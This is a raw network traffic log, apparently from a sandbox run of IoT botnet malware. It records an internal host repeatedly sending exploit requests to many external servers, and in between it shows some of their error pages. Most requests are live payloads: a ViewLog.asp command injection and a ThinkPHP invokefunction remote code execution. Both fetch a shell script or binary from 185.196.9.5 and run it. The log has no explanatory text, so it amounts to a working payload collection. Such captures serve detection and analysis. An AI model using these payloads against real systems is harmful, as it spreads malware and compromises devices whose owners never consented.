Feb 25, 2024 19:03:40.805986881 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:43.077848911 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.685746908 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:56.645670891 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:15.845659018 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:52.709129095 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
463	192.168.2.15	47366	88.85.236.29	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:39.166984081 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:40.549877882 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:42.181796074 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:45.637960911 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:52.293700933 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:05.349584103 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:32.229505062 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
464	192.168.2.15	57158	85.241.95.146	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:39.327239037 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:39.530045033 CET	433	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:38 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
465	192.168.2.15	46228	94.121.186.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:39.347058058 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
466	192.168.2.15	45592	62.56.238.60	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:39.358103991 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:40.069915056 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:41.477793932 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
467	192.168.2.15	51894	95.173.163.51	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:40.667396069 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:40.898569107 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:38 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }
Feb 25, 2024 19:03:40.898585081 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 Data Ascii: .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat;
Feb 25, 2024 19:03:40.898667097 CET	1286	IN	Data Raw: 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a Data Ascii: } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } foote
Feb 25, 2024 19:03:40.898683071 CET	1286	IN	Data Raw: 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 Data Ascii: float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0;
Feb 25, 2024 19:03:40.898695946 CET	1286	IN	Data Raw: 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 Data Ascii: kl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt
Feb 25, 2024 19:03:40.898708105 CET	1286	IN	Data Raw: 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 Data Ascii: 2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5K
Feb 25, 2024 19:03:40.898721933 CET	1122	IN	Data Raw: 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 Data Ascii: IwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g
Feb 25, 2024 19:03:40.899116993 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to leto.webadasinet.com's <a href="mailto:root@leto.w
Feb 25, 2024 19:03:40.899130106 CET	352	IN	Data Raw: 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 Data Ascii: &utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016

Session ID	Source IP	Source Port	Destination IP	Destination Port
468	192.168.2.15	35990	95.174.99.109	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:40.672916889 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:40.908318043 CET	275	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
469	192.168.2.15	57788	95.58.51.151	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:40.707484961 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:40.977605104 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:03:40.977758884 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
470	192.168.2.15	33458	95.57.216.146	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:40.746579885 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:42.341861010 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:44.229789972 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:48.197860956 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
